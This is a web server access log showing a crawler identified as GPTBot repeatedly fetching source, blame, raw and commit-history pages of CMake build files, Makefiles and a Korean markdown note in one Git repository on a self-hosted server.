"/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13347] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" -[17/Feb/2026:15:15:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13349] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" -[17/Feb/2026:15:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19491] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" -[17/Feb/2026:15:15:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 19492] [Gzip 6.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" -[17/Feb/2026:15:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11406] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" -[17/Feb/2026:15:15:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:15:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build" -[17/Feb/2026:15:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10769] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:15:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build" [Client 74.7.227.38] [Length 10192] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build" -[17/Feb/2026:15:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9921] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:15:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13479] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:15:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 2154] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 13477] [Gzip 6.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:15:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" [Client 74.7.227.38] [Length 9938] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/cmake_install.cmake" -[17/Feb/2026:15:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:15:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" [Client 74.7.227.38] [Length 14077] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeCache.txt" -[17/Feb/2026:15:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 335] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/compile_commands.json" -[17/Feb/2026:15:15:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9924] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:15:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 408] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9922] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:15:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 9920] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9928] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:15:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" [Client 74.7.227.38] [Length 9929] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/CMakeLists.txt" -[17/Feb/2026:15:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build" -[17/Feb/2026:15:15:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9918] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build" -[17/Feb/2026:15:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build" -[17/Feb/2026:15:15:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" [Client 74.7.227.38] [Length 10768] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/CMakeLists.txt" -[17/Feb/2026:15:15:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" [Client 74.7.227.38] [Length 9919] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build" -[17/Feb/2026:15:15:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72684] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project" -[17/Feb/2026:15:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 72686] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project" -[17/Feb/2026:15:15:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15614] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build" -[17/Feb/2026:15:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15613] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build" -[17/Feb/2026:15:15:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15616] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build" -[17/Feb/2026:15:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 15615] [Gzip 4.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build" -[17/Feb/2026:15:15:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10292] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:15:15:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 204055] [Gzip 14.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:15:15:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 10525] [Gzip 3.46] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:15:15:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 202128] [Gzip 15.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:15:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/compile_commands.json" [Client 74.7.227.38] [Length 11405] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build" -[17/Feb/2026:15:15:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 139339] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:15:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" [Client 74.7.227.38] [Length 139339] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" -[17/Feb/2026:15:15:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16085] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16084] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:15:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16086] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 16087] [Gzip 9.62] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/Makefile" -[17/Feb/2026:15:15:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/Makefile" [Client 74.7.227.38] [Length 4636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 